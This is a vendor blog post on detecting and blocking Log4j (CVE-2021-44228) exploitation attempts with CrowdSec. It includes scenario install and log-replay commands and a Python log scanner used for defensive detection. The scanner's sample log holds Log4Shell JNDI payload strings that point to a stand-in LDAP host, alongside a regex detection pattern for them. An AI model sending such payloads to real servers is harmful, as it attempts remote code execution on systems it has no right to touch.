Detect and block Log4j exploitation attempts with CrowdSec

If you work in Infosec, you had a very lousy weekend. And that’s because of the Log4j zero-day vulnerability (CVE-2021-44228) that was discovered. We had no choice but to roll up our sleeves to help our community before things got messier than they already were. 

As a result, we have released a scenario that will help you detect and block exploitation attempts against this vulnerability. The new scenario can be downloaded directly from our Hub and installed in the blink of an eye. Check this quick video to see the plugin in action:

As CrowdSec is all about crowd power and given the size of our quickly growing network, we are collecting a lot of IP addresses attempting to exploit this vulnerability. You can check the list here. It is updated several times a day and, needless to say, you should block the ones that are “validated”.

Those IP addresses were curated by our consensus algorithm, meaning they received a lot of votes against them from our user network. The ones in the “not enough data” state are highly suspicious but may still contain some false positives, so blocking them is up to you. The ones categorized as “benign” are IPs used by people who are usually on the good side of the fence; they probably scan to help, not to undermine.

Alternatively, you can use our replay mode to analyze your servers’ logs and check whether an exploitation of Log4j was attempted on your systems, by whom and when, using the appropriate scenario and the command lines below:

# Install the scenario from the Hub and reload the Security Engine
sudo cscli hub update
sudo cscli scenarios install crowdsecurity/apache_log4j2_cve-2021-44228
sudo systemctl reload crowdsec

# Replay mode, general form: sudo crowdsec --dsn "file://<path-to-log-file>" -no-api --type <log-type>
# Example for an Nginx access log:
sudo crowdsec --dsn "file:///var/log/nginx/access.log" -no-api --type nginx

# List the alerts raised by the scenario
sudo cscli alerts list --scenario crowdsecurity/apache_log4j2_cve-2021-44228
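To illustrate what a replay over web server logs is looking for, here is an added Python checker; it is not the CrowdSec scenario itself (which lives in the Hub as YAML and grok patterns). It parses Nginx combined-format access log lines, percent-decodes the request line, referer and user agent so that encoded lookups are not missed, flags lines carrying a JNDI lookup string, and tallies the offending source IPs. The log lines, IP addresses and function names are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample Nginx access log lines (documentation-range IPs, not real traffic)
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:22:14:03 +0000] "GET /?x=${jndi:ldap://203.0.113.99:1389/a} HTTP/1.1" 200 612 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Dec/2021:22:15:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Dec/2021:22:16:40 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.99:1389/a}"
192.0.2.55 - - [10/Dec/2021:22:17:02 +0000] "GET /api?q=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.200%2Fx%7D HTTP/1.1" 404 153 "-" "curl/7.68.0"
"""

# Nginx "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# The Log4j lookup prefix the scenario is hunting for
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def normalize(field):
    """Percent-decode twice so single- and double-encoded payloads are compared in clear text."""
    for _ in range(2):
        field = unquote(field)
    return field

def is_log4j_attempt(line):
    """Return (ip, timestamp, field) when a JNDI lookup appears in any attacker-controlled field, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # not a combined-format line; skip rather than crash on odd input
    for field in ("request", "referer", "ua"):
        if JNDI_RE.search(normalize(m.group(field))):
            return m.group("ip"), m.group("ts"), field
    return None

def scan(log_text):
    """Scan a whole log text and return one hit tuple per matching line."""
    return [hit for hit in map(is_log4j_attempt, log_text.splitlines()) if hit]

def offenders(hits, threshold=1):
    """Sorted list of source IPs seen at least `threshold` times, e.g. to feed a blocklist."""
    counts = Counter(ip for ip, _, _ in hits)
    return sorted(ip for ip, n in counts.items() if n >= threshold)

if __name__ == "__main__":
    for ip, ts, field in scan(SAMPLE_LOG):
        print(f"{ts} {ip} jndi lookup in {field}")
    print("offenders:", offenders(scan(SAMPLE_LOG)))
```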

We also published a real-time Log4j threat tracker, where you can visualize critical data as reported by the CrowdSec community: the Autonomous Systems (AS) most used by cybercriminals trying to exploit the vulnerability, and of course the IP list with the related country and number of threats.

Let’s band together and bring our environments back to optimum security. 
